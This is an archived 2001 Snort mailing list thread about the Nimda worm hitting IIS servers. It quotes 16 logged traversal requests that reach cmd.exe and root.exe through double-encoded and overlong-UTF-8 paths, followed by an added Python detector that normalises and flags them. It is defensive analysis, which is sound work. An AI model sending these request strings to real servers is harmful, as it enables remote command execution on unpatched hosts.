Snort mailing list archives
RE: Not CodeGreen
From: "Ginnetty, James" <JGinnetty () skandia com>
Date: Tue, 18 Sep 2001 16:22:54 -0400
Definitely not our friend Code Red. Our log files are showing just how pervasive this thing is. Looks like it will try 16 different exploit strings in an attempt to infect another server before moving on to the next IP. Here is a sorted cut from one of the logs. It is repeated many times over from different IPs. No wonder the level of traffic....

Jim

14:00:43 198.146.11.167 GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
14:00:43 198.146.11.167 GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
14:00:43 198.146.11.167 GET /c/winnt/system32/cmd.exe?/c+dir
14:00:43 198.146.11.167 GET /d/winnt/system32/cmd.exe?/c+dir
14:00:43 198.146.11.167 GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
14:00:43 198.146.11.167 GET /MSADC/root.exe?/c+dir
14:00:44 198.146.11.167 GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
14:00:44 198.146.11.167 GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
14:00:44 198.146.11.167 GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
14:00:44 198.146.11.167 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
14:00:43 198.146.11.167 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
14:00:44 198.146.11.167 GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
14:00:44 198.146.11.167 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
14:00:43 198.146.11.167 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
14:00:44 198.146.11.167 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
14:00:43 198.146.11.167 GET /scripts/root.exe?/c+dir

-----Original Message-----
From: bthaler () webstream net [mailto:bthaler () webstream net]
Sent: Tuesday, September 18, 2001 3:43 PM
To: snort-users () lists sourceforge net
Subject: [Snort-users] Not CodeGreen

For everyone's information:

The inordinate amount of traffic you're most likely seeing today is almost surely NOT CodeGreen. CodeGreen was developed as a way to patch servers infected with CodeRed. What you are most likely seeing is in fact "nimda", which by all accounts seems like the last 3 or 4 big IIS exploits (CodeRed, Unicode, et al.) rolled up into one big exploit. Again, this is most likely NOT CodeGreen, even though some have referred to it as that.

BTW, my Snort-1.7 MySQL database has surpassed 1,000,000 records just today, and is still going strong. How's that for scalability, baby? I run Snort-Win32 on one NT SMP machine, and the database from another machine, so the load gets balanced. Hats off to Martin R, et al.

Regards,
Brad T.

_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
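The 16 request strings in Jim's log cut are all the same two probes (traversal to cmd.exe, or a direct hit on a planted root.exe) wearing different encodings: double percent-encoding (%255c, %%35%63, %25%35%63, %252f) and overlong or malformed UTF-8 (%c0%af, %c0%2f, %c1%1c, %c1%9c). A detector that matches only the literal strings misses the next variant; one that decodes the way the vulnerable server did catches them all. The script below is an added example written for this page, not code from either poster or from the Snort project. It assumes the log layout shown in the post (`HH:MM:SS client-IP method URL`, one request per line), and its permissive 2-byte UTF-8 decoder is an assumption about the historical IIS behaviour: it takes the low bits of both bytes without checking validity, which is exactly what collapses every overlong form above into '/' or '\'. The sample log embeds the 16 lines from the post plus one constructed benign request.

```python
import re
from collections import defaultdict

# --- decoding helpers -----------------------------------------------------

_PCT = re.compile(rb"%([0-9A-Fa-f]{2})")

def percent_decode_once(data: bytes) -> bytes:
    """One pass of %XX decoding. b'%%35%63' only becomes b'%5c' here; a second
    pass is what turns that into a backslash (the double-decode trick)."""
    return _PCT.sub(lambda m: bytes([int(m.group(1).decode(), 16)]), data)

def lenient_utf8_decode(data: bytes) -> str:
    """Decode 2-byte UTF-8 lead sequences WITHOUT rejecting overlong or
    malformed forms. Assumption: this approximates the permissive decoder the
    Unicode traversal bug abused, so C0 AF, C0 2F, C1 1C and C1 9C all become
    '/' or '\\'. Python's strict str.decode('utf-8') would raise on each."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))      # plain ASCII (or latin-1 fallback)
            i += 1
    return "".join(out)

def normalize_path(url: str):
    """Return (canonical path, escaped_root). escaped_root is True when the
    fully decoded request used '..' to climb above the web root."""
    path = url.split("?", 1)[0]
    raw = path.encode("latin-1", errors="replace")
    decoded = percent_decode_once(percent_decode_once(raw))
    text = lenient_utf8_decode(decoded).replace("\\", "/")
    segments, escaped = [], False
    for seg in text.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            else:
                escaped = True      # stepped past the root
            continue
        segments.append(seg)
    return "/" + "/".join(segments), escaped

# --- log classification ---------------------------------------------------

LOG_LINE = re.compile(r"^(\d\d:\d\d:\d\d)\s+(\S+)\s+(\S+)\s+(\S+)$")
SHELL_TARGETS = {"cmd.exe", "root.exe"}
# double-encoding or overlong-UTF-8 markers in the raw URL
EVASION = re.compile(r"%25|%%|%c0|%c1", re.IGNORECASE)

def classify(line: str):
    """Parse one log line; return a dict with a (possibly empty) reasons list,
    or None if the line does not match the expected layout."""
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    ts, src, method, url = m.groups()
    canon, escaped = normalize_path(url)
    reasons = []
    if escaped:
        reasons.append("traversal")
    if canon.rsplit("/", 1)[-1].lower() in SHELL_TARGETS:
        reasons.append("shell-target")
    if EVASION.search(url):
        reasons.append("encoding-evasion")
    return {"time": ts, "src": src, "method": method, "url": url,
            "canon": canon, "reasons": reasons}

def scan(lines):
    """All parsed lines that triggered at least one reason."""
    return [r for r in map(classify, lines) if r and r["reasons"]]

def distinct_probes_by_source(lines):
    """How many distinct flagged request strings each client sent (Jim counted
    16 per source in his cut)."""
    seen = defaultdict(set)
    for r in scan(lines):
        seen[r["src"]].add(r["url"])
    return {src: len(urls) for src, urls in seen.items()}

# Sample input: the 16 lines from the post, plus one constructed benign line.
SAMPLE_LOG = [
    "14:00:43 198.146.11.167 GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir",
    "14:00:43 198.146.11.167 GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir",
    "14:00:43 198.146.11.167 GET /c/winnt/system32/cmd.exe?/c+dir",
    "14:00:43 198.146.11.167 GET /d/winnt/system32/cmd.exe?/c+dir",
    "14:00:43 198.146.11.167 GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir",
    "14:00:43 198.146.11.167 GET /MSADC/root.exe?/c+dir",
    "14:00:44 198.146.11.167 GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir",
    "14:00:44 198.146.11.167 GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir",
    "14:00:44 198.146.11.167 GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir",
    "14:00:44 198.146.11.167 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir",
    "14:00:43 198.146.11.167 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir",
    "14:00:44 198.146.11.167 GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir",
    "14:00:44 198.146.11.167 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
    "14:00:43 198.146.11.167 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir",
    "14:00:44 198.146.11.167 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir",
    "14:00:43 198.146.11.167 GET /scripts/root.exe?/c+dir",
    "14:00:45 10.0.0.5 GET /index.html",   # constructed benign request
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["time"], hit["src"], ",".join(hit["reasons"]), hit["canon"])
    print(distinct_probes_by_source(SAMPLE_LOG))
```

Run as-is it flags 16 of the 17 sample lines and reports 16 distinct probe strings from 198.146.11.167; every traversal variant canonicalises to the same `/winnt/system32/cmd.exe`, which is the string worth alerting and counting on. The `/c/...` and `/MSADC/root.exe` lines carry no traversal at all and are caught only by the target-name check, so a rule set that keys solely on `..` would miss them.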
Current thread:
- Not CodeGreen bthaler (Sep 18)
- <Possible follow-ups>
- RE: Not CodeGreen Ginnetty, James (Sep 18)